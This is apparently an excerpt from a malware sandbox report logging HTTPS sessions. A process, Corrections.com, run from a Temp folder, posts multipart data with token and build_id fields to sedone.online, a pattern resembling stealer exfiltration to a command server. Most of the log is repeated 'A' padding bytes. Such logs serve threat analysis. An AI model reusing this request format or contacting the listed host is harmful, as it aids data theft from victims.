41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49785	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:04 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----47YMOHDTJW4EUAAA1VKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------47YMOHDTJW4EUAAA1VKFCont
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:04 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49791	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:07 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GLXT0HV3OP8YU379R900 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:07 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 48 56 33 4f 50 38 59 55 33 37 39 52 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 48 56 33 4f 50 38 59 55 33 37 39 52 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 48 56 33 4f 50 38 59 55 33 37 39 52 39 30 30 0d 0a 43 6f 6e 74 Data Ascii: ------GLXT0HV3OP8YU379R900Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------GLXT0HV3OP8YU379R900Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------GLXT0HV3OP8YU379R900Cont
